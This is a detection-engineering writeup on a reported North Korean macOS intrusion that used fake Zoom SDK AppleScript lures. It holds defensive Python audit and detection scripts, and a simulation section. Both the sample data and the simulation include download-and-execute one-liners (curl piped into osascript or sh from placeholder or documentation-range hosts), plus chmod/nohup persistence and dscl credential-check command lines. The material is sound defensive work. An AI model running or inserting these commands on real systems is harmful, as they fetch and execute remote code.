Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
Summary
Microsoft Threat Intelligence has reported a macOS-focused campaign attributed to the North Korean state-sponsored actor Sapphire Sleet. The operation relies on social engineering to persuade targets to run malicious AppleScript files presented as a legitimate Zoom SDK update. Once executed, the script retrieves additional payloads through curl and osascript, expanding the intrusion in multiple stages. The malware is designed to steal credentials, cryptocurrency wallet data, and other sensitive information while also bypassing native macOS security protections to remain active on compromised systems.
Investigation
The investigation outlines a multi-stage infection chain that begins with a .scpt lure file and continues through a sequence of curl-to-osascript payload downloads. Researchers identified several backdoor components, including com.apple.cli, a services binary, icloudz, and com.google.chromes.updaters. The threat actors were also observed tampering with the macOS TCC database to obtain AppleEvents permissions, using reflective code loading techniques, and establishing persistence through a launch daemon. Exfiltration activity relied on custom user-agent strings and communications through the Telegram Bot API.
Mitigation
Apple has released Safe Browsing and XProtect updates to disrupt the campaign's infrastructure and malware components. Microsoft recommends blocking execution of .scpt files, restricting curl-to-shell and curl-to-osascript pipelines, monitoring for unauthorized changes to the TCC database, and auditing launch daemon installations for suspicious entries. Users should be warned about unsolicited software update prompts and told not to enter credentials into unexpected dialogs or scripts.
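Two of the checks recommended above, auditing launch daemon installations and reviewing TCC AppleEvents grants, can be scripted. The following is an added example, not code from Microsoft or from this page's detection content: it parses constructed LaunchDaemon plists with plistlib and queries a constructed in-memory copy of the TCC `access` table with sqlite3. The file paths, labels, database rows, the interpreter list and the allowlist are all assumptions for illustration; the column conventions (client_type 0 = bundle id, 1 = path; auth_value 2 = allowed) follow public TCC write-ups.

```python
"""Audit checks for two artifacts the report names: launch daemon persistence and
AppleEvents grants in the TCC database. Added example; every plist, path and
database row below is constructed, not taken from a real host or the report."""
import plistlib
import sqlite3

# Constructed plists as they would appear under /Library/LaunchDaemons.
SAMPLE_PLISTS = {
    "/Library/LaunchDaemons/com.google.chromes.updaters.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.chromes.updaters</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/.icloudz</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>""",
    "/Library/LaunchDaemons/com.apple.cli.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.cli</string>
  <key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
  <string>curl -s http://203.0.113.10:1337/u | osascript</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "/Library/LaunchDaemons/com.example.backup.plist": b"""<?xml version="1.0"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup-agent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/")  # assumption
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3"}          # assumption


def audit_launch_daemon(path, data):
    """Return finding strings for one plist (empty list = nothing suspicious)."""
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    program = args[0]
    findings = []
    if path.rsplit("/", 1)[-1] != f"{label}.plist":
        findings.append("label does not match filename")
    # Apple's own daemons live in /System/Library/LaunchDaemons; a com.apple.* label
    # in the third-party directory is masquerading.
    if label.startswith("com.apple.") and path.startswith("/Library/"):
        findings.append("Apple-style label outside /System/Library/LaunchDaemons")
    if program.startswith(USER_WRITABLE) or "/." in program:
        findings.append(f"program in user-writable or hidden path: {program}")
    joined = " ".join(args)
    if program.rsplit("/", 1)[-1] in INTERPRETERS and ("curl" in joined or "osascript" in joined):
        findings.append("interpreter wrapping curl/osascript (download-and-execute)")
    return findings


# Subset of the real TCC.db `access` table. Assumed conventions (from public TCC
# write-ups): client_type 0 = bundle identifier, 1 = absolute path; auth_value 2 =
# allowed; for kTCCServiceAppleEvents, indirect_object_identifier is the target app.
TCC_SCHEMA = ("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
              "auth_value INTEGER, indirect_object_identifier TEXT, last_modified INTEGER)")
SAMPLE_TCC_ROWS = [  # constructed rows
    ("kTCCServiceAppleEvents", "com.apple.Terminal", 0, 2, "com.apple.systemevents", 1700000000),
    ("kTCCServiceAppleEvents", "/Users/Shared/.icloudz", 1, 2, "com.apple.systemevents", 1700000500),
    ("kTCCServiceAppleEvents", "com.example.automation", 0, 0, "com.apple.finder", 1700000100),
    ("kTCCServiceSystemPolicyAllFiles", "/Users/Shared/.icloudz", 1, 2, "UNUSED", 1700000500),
]


def suspicious_appleevents_grants(rows, allowlist=frozenset({"com.apple.Terminal"})):
    """Return (client, target, reasons) for allowed AppleEvents grants not on the allowlist."""
    con = sqlite3.connect(":memory:")
    con.execute(TCC_SCHEMA)
    con.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", rows)
    query = ("SELECT client, client_type, indirect_object_identifier FROM access "
             "WHERE service = 'kTCCServiceAppleEvents' AND auth_value = 2")
    flagged = []
    for client, ctype, target in con.execute(query):
        if client in allowlist:
            continue
        reasons = ["not on allowlist"]
        if ctype == 1:
            reasons.append("path-identified client (no bundle id)")
        if client.startswith(USER_WRITABLE):
            reasons.append("client lives in a user-writable path")
        flagged.append((client, target, reasons))
    return flagged


if __name__ == "__main__":
    for path, data in SAMPLE_PLISTS.items():
        print(path, audit_launch_daemon(path, data))
    print(suspicious_appleevents_grants(SAMPLE_TCC_ROWS))
```

On a live host the inputs would be the plists under /Library/LaunchDaemons and the system database at /Library/Application Support/com.apple.TCC/TCC.db, which is SIP-protected and only readable by a process holding Full Disk Access; run the collection from an EDR agent or an FDA-granted terminal and diff the grants against a known-good baseline rather than eyeballing them.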
Response
Defenders should detect malicious AppleScript execution, abnormal curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.
Attack Flow

```mermaid
graph TB
  %% Class definitions
  classDef technique fill:#99ccff
  classDef operator fill:#ff9900

  %% Technique nodes
  tech_user_execution["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/><b>Description</b>: Victims are tricked into running a malicious file that initiates the intrusion."]
  class tech_user_execution technique
  tech_trusted_dev_proxy["<b>Technique</b> – <b>T1127 Trusted Developer Utilities Proxy Execution</b><br/><b>Description</b>: Legitimate developer tools are used as proxies to execute malicious payloads, bypassing security controls."]
  class tech_trusted_dev_proxy technique
  tech_subvert_trust["<b>Technique</b> – <b>T1553 Subvert Trust Controls</b><br/><b>Description</b>: Adversaries manipulate trusted relationships or configurations to gain elevated privileges or execute code."]
  class tech_subvert_trust technique
  tech_launch_daemon["<b>Technique</b> – <b>T1543.004 Create or Modify System Process: Launch Daemon</b><br/><b>Description</b>: A new daemon or system service is created or an existing one modified to achieve persistence."]
  class tech_launch_daemon technique
  tech_alt_auth_material["<b>Technique</b> – <b>T1550 Use Alternate Authentication Material</b><br/><b>Description</b>: Stolen or forged credentials, tokens, or certificates are used to authenticate as a legitimate user."]
  class tech_alt_auth_material technique
  tech_archive_lib["<b>Technique</b> – <b>T1560.002 Archive Collected Data: Archive via Library</b><br/><b>Description</b>: Collected data is compressed using a software library before exfiltration."]
  class tech_archive_lib technique
  tech_exfil_alt_proto["<b>Technique</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/><b>Description</b>: Data is exfiltrated using non-standard protocols such as DNS, FTP, or custom ports to avoid detection."]
  class tech_exfil_alt_proto technique
  tech_dynamic_resolution["<b>Technique</b> – <b>T1568 Dynamic Resolution</b><br/><b>Description</b>: The adversary resolves command-and-control infrastructure or resources at runtime, often via DNS or other lookups."]
  class tech_dynamic_resolution technique
  tech_reflective_loading["<b>Technique</b> – <b>T1620 Reflective Code Loading</b><br/><b>Description</b>: Malicious code is loaded directly into memory without touching disk, evading traditional defenses."]
  class tech_reflective_loading technique
  tech_system_binary_proxy["<b>Technique</b> – <b>T1218 System Binary Proxy Execution</b><br/><b>Description</b>: Trusted system binaries are used to proxy execution of malicious payloads."]
  class tech_system_binary_proxy technique
  tech_modify_auth_process["<b>Technique</b> – <b>T1556 Modify Authentication Process</b><br/><b>Description</b>: Authentication mechanisms are altered to accept forged credentials or tokens."]
  class tech_modify_auth_process technique

  %% Connections showing attack flow
  tech_user_execution -->|leads_to| tech_trusted_dev_proxy
  tech_trusted_dev_proxy -->|enables| tech_subvert_trust
  tech_subvert_trust -->|creates| tech_launch_daemon
  tech_launch_daemon -->|uses| tech_alt_auth_material
  tech_alt_auth_material -->|prepares| tech_archive_lib
  tech_archive_lib -->|triggers| tech_exfil_alt_proto
  tech_exfil_alt_proto -->|facilitates| tech_dynamic_resolution
  tech_subvert_trust -->|employs| tech_reflective_loading
  tech_reflective_loading -->|updates| tech_launch_daemon
  tech_trusted_dev_proxy -->|leverages| tech_system_binary_proxy
  tech_system_binary_proxy -->|leads_to| tech_subvert_trust
  tech_alt_auth_material -->|supports| tech_modify_auth_process
  tech_modify_auth_process -->|continues| tech_exfil_alt_proto
```
Detections
- Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)
- Possible Execution by Use of chmod and nohup in Single Command (via cmdline)
- MacOS Credential Validation via Dscl Authonly (via cmdline)
- Suspicious Curl Execution Attempt [MacOS] (via cmdline)
- Archive Was Created In MacOS Temporary Folder (via file_event)
- Dangerous Permissions for a Binary/Script/Folder was set (via cmdline)
- IOCs (HashSha256) to detect: Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
- IOCs (SourceIP) to detect: Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
- IOCs (DestinationIP) to detect: Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise
- Detection of Sapphire Sleet C2 Communication [Linux Network Connection]
- Detection of AppleScript Execution with Curl Piping on macOS [Linux Process Creation]
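Several of the rules above key on the process command line. As an added example (not the published Sigma rules and not code from Microsoft or this page), the Python below re-implements comparable heuristics for the osascript-plus-curl pipe, chmod-and-nohup, dscl -authonly, dangerous chmod in temp folders, suspicious curl and direct-IP-with-uncommon-port cases, and runs them over constructed macOS process-creation records. The rule names, regular expressions, the "common port" list and every sample command line are assumptions for illustration; the real rules' exact conditions may differ.

```python
"""Illustrative re-implementation of cmdline-based detections from the list above,
run over constructed macOS process-creation records. Not the published Sigma rules;
regexes, port list and sample events are assumptions for the example."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent: str
    cmdline: str


# Constructed sample telemetry (not taken from the report). 406 and 407 are benign controls.
SAMPLE_EVENTS = [
    ProcessEvent(401, "Terminal",
                 "osascript -e 'do shell script \"curl -s https://sdk-update.example/zoom.sh | sh\"'"),
    ProcessEvent(402, "sh", "chmod +x /tmp/.icloudz && nohup /tmp/.icloudz >/dev/null 2>&1 &"),
    ProcessEvent(403, "sh", "dscl . -authonly jdoe Summer2024!"),
    ProcessEvent(404, "sh", "curl -s -A 'Mozilla/5.0 zoom-sdk' -o /tmp/com.apple.cli "
                            "http://203.0.113.10:1337/p"),
    ProcessEvent(405, "sh", "chmod 777 /Users/Shared/.updater"),
    ProcessEvent(406, "Terminal", "curl -s https://example.com/"),
    ProcessEvent(407, "launchd", "/usr/bin/osascript /Users/jdoe/Library/Scripts/backup.scpt"),
]

# Ports treated as "common" for the direct-IP rule (assumption; the real rule's list may differ).
COMMON_PORTS = ("80", "443", "8080", "8443")
# Writable staging directories that make a chmod or a curl -o suspicious (assumption).
TEMP_DIRS = r"/(?:tmp|private/tmp|Users/Shared)/"

RULES = {
    "AppleScript execution with curl piping":
        re.compile(r"\bosascript\b.*\bcurl\b.*\|", re.S),
    "chmod and nohup in single command":
        re.compile(r"\bchmod\b.*\bnohup\b|\bnohup\b.*\bchmod\b"),
    "Credential validation via dscl -authonly":
        re.compile(r"\bdscl\b.*\s-authonly\b"),
    "Dangerous permissions on binary/script/folder":
        re.compile(r"\bchmod\b\s+(?:-R\s+)?(?:[0-7]?777|a\+rwx|u?\+x)\s+\S*" + TEMP_DIRS),
    "Suspicious curl execution":
        re.compile(r"\bcurl\b(?=.*(?:\s-A\s|--user-agent|\s-o\s+" + TEMP_DIRS + "))"),
    "HTTP to direct IP with uncommon port":
        re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}:(?!(?:%s)\b)\d+" % "|".join(COMMON_PORTS)),
}


def evaluate(events):
    """Return (rule_name, pid) for every (event, rule) pair whose cmdline matches."""
    return [(name, ev.pid) for ev in events for name, rx in RULES.items() if rx.search(ev.cmdline)]


def hits_by_pid(events):
    """Group matched rule names per pid; pids absent from the result matched nothing."""
    grouped = {}
    for name, pid in evaluate(events):
        grouped.setdefault(pid, set()).add(name)
    return grouped


if __name__ == "__main__":
    for pid, names in sorted(hits_by_pid(SAMPLE_EVENTS).items()):
        print(pid, "->", ", ".join(sorted(names)))
```

The benign controls matter as much as the hits: a bare `osascript` run from launchd (407) and an ordinary `curl` to a hostname (406) must stay silent, or the rule set will drown in developer and automation noise. Tune the port list and staging directories against your own baseline before deploying anything like this.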
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the execution of the adversary technique (TTP) that the detection rule is designed to catch. The commands and narrative directly reflect the identified TTP and are meant to generate the exact telemetry the detection logic expects.

Attack Narrative & Commands:
An adversary hosts a malicious shell script on a remote server. To avoid dropping a standalone binary, they use the native AppleScript interpreter (osascript) to run a shell command that pipes a curl download straight into sh, achieving download-and-execute in a single command line. This matches the rule's osascript + curl pattern.

```bash
# Malicious one-liner that should trigger the rule (the hostname is a placeholder)
osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'
```

The command line contains both osascript and curl, so the Sigma rule's condition (selection_osascript and selection_curl) evaluates to true.

Regression Test Script:

```bash
#!/bin/sh
# simulate_osascript_curl.sh
# Purpose: reproduce the telemetry (osascript + curl + pipe in one command line)
# that should fire the detection rule, without executing anything fetched remotely.
set -e

# Write a harmless local payload so the pipeline has something safe to execute.
PAYLOAD=/tmp/benign_payload.sh
printf '#!/bin/sh\necho "benign simulation payload executed"\n' > "$PAYLOAD"

# curl reads the local file over file://; the command line still contains
# "osascript", "curl" and "|", which is what the rule keys on.
osascript -e "do shell script \"curl -s file://$PAYLOAD | sh\""
```

Cleanup Commands:

```bash
#!/bin/sh
# cleanup_osascript_curl.sh
# Remove the temporary payload and kill only osascript processes that belong to this
# simulation (pkill -f matches the full command line, so keep the pattern specific).
rm -f /tmp/benign_payload.sh
pkill -f 'osascript -e .*benign_payload' || true
```